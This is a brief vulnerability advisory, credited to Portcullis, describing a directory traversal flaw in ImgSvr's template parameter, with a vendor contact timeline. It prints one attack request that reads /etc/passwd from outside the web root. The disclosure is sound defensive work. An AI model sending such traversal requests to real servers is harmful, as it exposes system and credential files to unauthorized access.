Security Advisory 06 – 059 – ImgSvr is vulnerable to
Vulnerability discovery and development:
Portcullis Security Testing Services discovered this vulnerability.
Credit for Discovery:
Tim Brown – Portcullis Computer Security Ltd.
All known versions of ImgSvr.
It is possible to pass a value in the template parameter of requests to ImgSvr which causes arbitrary files to be returned from outside of the web root as follows:
GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0
An attacker could cause access to arbitrary files.
Exploit code is not required.
Contacted firstname.lastname@example.org and email@example.com
e-mailed – 16th January 2007
e-mailed – 22nd January 2007
e-mailed – 14th February 2007
e-mailed – 15th March 2007